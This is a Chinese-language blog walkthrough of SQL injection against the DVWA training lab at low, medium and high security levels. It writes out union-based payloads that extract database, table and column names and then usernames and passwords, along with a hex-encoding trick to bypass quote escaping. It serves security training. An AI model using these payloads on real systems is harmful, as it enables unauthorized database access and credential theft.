dvwa sql注入

最新推荐文章于 2024-04-07 21:08:20 发布
最新推荐文章于 2024-04-07 21:08:20 发布
阅读量824 收藏 11
点赞数 2
文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yangdogsun/article/details/107428185
版权

dvwa sql注入

low

在这里插入图片描述

一、判断sql是数字型注入还是字符型注入

1.输入1

在这里插入图片描述

2.输入1’和1’#

输入1’

在这里插入图片描述

报错

输入1’#

在这里插入图片描述

不报错

此处判断User ID是字符型的,在sql语句中有 ’ ’ 包裹。

3.检验是否可注入,输入1’ or 1=1#

在这里插入图片描述

1后面的 ’ 闭合了id字段,or 1=1 使得where判断语句失效,即使其恒为真,架空了id字段的作用,无论id输入什么,where总是真,所以爆出了表中所有人的姓名。#起到注释作用,注释后面的sql语句,主要是id字段后一个 ’ 。

注意:此处的 ’ 是英文字符。

经过这三步检验,可判断此处为字符型sql注入。

二、进行注入

1.爆出数据库名称

1' union select 1,database()#

在这里插入图片描述

得数据库名称为dvwa

2.爆出数据库中的表

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

在这里插入图片描述

此处得出dvwa中的表有两个: guestbook,users

3.爆出目标表中的字段名

1'union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#

在这里插入图片描述

4.爆出目标字段的数据,此处当然是password和user

1'union select user,password from users#

在这里插入图片描述

注解:

column_name:列的名称

information_schema.columns:表示所有列的信息(在整个mysql里面)(information_schema:表示所有信息,包括库、表、列)(information_schema.tables:表示所有表的信息)

table_schema:数据库的名称

table_name:表的名称

Medium

在这里插入图片描述

在这里插入图片描述

此处设置了下拉选择表单,以此来控制用户的输入。对于这种情况,我们可以尝试用burpsuite抓包试试。

在这里插入图片描述

图中标红的地方就是我们从网页上选择提交的数据,这里我们就可以按照low级别的操作步骤进行注入测试了。首先测试是字符型注入还是数字型注入。

修改为:1’ or 1=1#

在这里插入图片描述

报错

在这里插入图片描述

修改为:1 or 1=1

在这里插入图片描述

爆出所有用户姓名。说明存在数字型注入。之后的操作就和low中操作一致了。

其中需要注意的一个点是在爆表中字段时,会报出错误

在这里插入图片描述

在这里插入图片描述

这是因为单引号被转义了,‘变成了\’,这里我们可以用十六进制进行绕过,将字符串users变为十六进制的7573657273

在写sql语句时记得在7573657273前面加上0x表示十六进制。如下图所示

在这里插入图片描述

在这里插入图片描述

下面直接放最后一步的操作图片。

在这里插入图片描述

High

在这里插入图片描述

我们看一下源码

在这里插入图片描述

在这里插入图片描述对比一下low级别的源码,可以发现high级别的sql语句只是在where语句的后面添加了一个LIMIT 1限定,令其只能输出一个结果。对于这种情况,我们只需在注入的时候加上#注释掉后面的LIMIT 1就可以了。其操作步骤就和LOW级别一样了。

木 易__yz
关注
dvwasql注入
BAIXUAN9527的博客
03-27 528
SQL i 攻击者在web表单或者页面请求的查询字符串中通过查询的字符串恶意的注入SQl命令,从而使数据库执行恶意的SQl语句 1验证web存在SQL漏洞 2寻找注入点 2.1web页面某个表单的输入框里 2.2web页面的URL查询(带参数的URl) 3构造攻击的SQL语句 4通过注入点提交构造的攻击语句,构造的SQL数据库执行 5通过web页面返回数据,提取分析我们想要的数据信息 注入点类...
DVWA-sql注入
Darklord.W
04-09 372
sql注入低中高步骤截图及说明 低: 判断注入类型 判断字段数 判断回显位置 查询数据库版本以及数据库名 查询数据库内表名 查询表内字段名 查询用户名密码 中: 发送到repeater 判断注入类型 猜字段数 判断回显位置 查询版本以及数据库 查询表名 查询字段名 高: Hig...
dvwa——sql注入
GZY0601的博客
09-16 626
Hello!转眼一看距离我上次发文章都是一年前的事情了,中职的第三年都一直备赛的路上,一次比了三个项目,搞得学的好乱,现在上了大学,开始回来复习安全的东西,说实话好久没练了很多基本的东西都忘记了,去年就一直说要写dvwa的教程,现在刚好算是可以边复习边更新。哈哈哈哈哈哈!SQL注入是一种常见的网络安全漏洞和攻击方式,它利用应用程序对用户输入数据的处理不当,使得攻击者能够在执行SQL查询时插入恶意的SQL代码。通过成功注入恶意代码,攻击者可以执行未经授权的数据库操作,获取敏感信息、篡改数据甚至完全破坏数据库
DVWASQL注入
热门推荐
qq_58091216的博客
05-01 2万+
前面没有介绍什么是DVWA,在写SQL注入之前介绍一下什么是DVWA. 一.DVWA介绍 1.1 DVWA简介 DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如sql注入,XSS,密码破解等常见漏洞。旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 1.2 DVWA模块 DVWA共有十个模块: Brute Force(暴力(破解)) Command Injection(命令行...
kali下的SQL注入DVWA sql注入 low等级)
weixin_43749051的博客
03-06 2054
(1)在kali下打开浏览器,输入http://192.168.0.184(win7的IP地址)/DVWA/login.php 输入账号密码登录进去,然后点击左侧的“DVWA Security”,选择“low”级别,点击选定。 (2)打开火狐浏览器,添加附件组件tamper data,安装后打开,然后登录dvwa,获取cookie值 (3)获取要测试的url,点击SQL Injection菜单,在输入框输入1,点击submit,获取待测试的url:http://192.168.169.129/dvwa
DVWASQL注入详解(包含知识点)
10-20
DVWA(Damn Vulnerable Web Application)的SQL注入(low)级别中,可以学习到多个关于SQL注入的知识点。例如,了解了SQL语句中的"ORDER BY"子句,它用于对查询结果进行排序。"ORDER BY 1"意味着按照第一个字段...
dvwa-sql注入
AI_SumSky的博客
11-27 5831
sql注入 low级别 万能sql语句试一试1’ or '1=1,发现遍历出了全部用户信息 分析源码发现该后台对传入的sql语句没有任何限制和过滤就直接执行,确认存在sql注入漏洞就可以开始摸数据库信息了,或者用工具sqlmap直接莽就完事了 用order by测试字段为2,这是为了后面用union方法,这个方法相关联 的两个查询语句查询参数个数必须相等 由源码函数可知该数据库mysql可以用级联的方法套数据库信息,1’ union select database(),user()#查看当前数据库
DVWA下的SQL注入
07-25
SQL
DVWA-SQL注入
HoYim
03-03 481
low 1.判断注入类型 输入1’and’1’=’1 输入1’and’1’=’2 无结果 输入1’or’1’=’1 类似1’or’1234’=’1234 由此判断出为字符型注入 2.判断字段数 ORDER BY 1 表示 所select 的字段按第一个字段排序,当后面跟的数字超过字段数时,则显示错误 输入1’ order by 1 输入1’ order by 2 输入1’ order b...
DVWA——SQL注入
最新发布
m0_74426634的博客
04-07 1130
日前,国内最大的程序员社区CSDN网站的用户数据库被黑客公开发布,600万用户的登录名及密码被公开泄露,随后又有多家网站的用户密码被流传于网络,连日来引发众多网民对自己账号、密码等互联网信息被盗取的普遍担忧。网络安全成为了现在互联网的焦点,这也恰恰触动了每一位用户的神经,由于设计的漏洞导致了不可收拾的恶果,验证了一句话“出来混的,迟早是要还的”,所以介绍一些常用的攻击技术和防范策略。SQL Injection也许很多人都知道或者使用过,如果没有了解或完全没有听过也没有关系,因为接下来我们将介绍SQL Inj
DVWA--SQL注入
xiaoxiao的博客
01-07 3458
SQL注入原理 就是通过sql命令插入到web表单递交或输入域名页面请求的查询字符串,最终达到欺骗服务器执行恶意的SDL命令。具体来说,它是利用现有应用程序,将恶意的SQL命令注入到后台数据库引擎执行的能力,它可以通过在WEB表单中输入恶意SQL语句得到包含漏洞的网站数据库,而不是按照设计者意图去执行。 SQL注入类型 按照数据提交的方式: GET注入、POST注入、COOKIE注入、HTTP头部...
dvwa中的sql注入
Jerome的博客
05-02 469
首先先启动网站,点击DVWA Security 将安全等级改为Low后提交即可。 点击SQL Injection ,输入:1,判断注入类型是数字型还是字符型。 根据返回信息,所以知道是数字型 输入:1’ ORDER BY 1# 输入:1’ ORDER BY 2# 输入 :1’ ORDER BY 3# ,发现报错信息,由此可以判断字段不超过3。 由于我们知道只有两个字段,所以可以输入:1’ UNION SELECT 1,2# 输入:1’ union select database(),versio
dvwaSQL注入(1)
Lethe's Blog
02-23 1605
一、Low SQL Injection 1.sql语句 //low等级源码 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值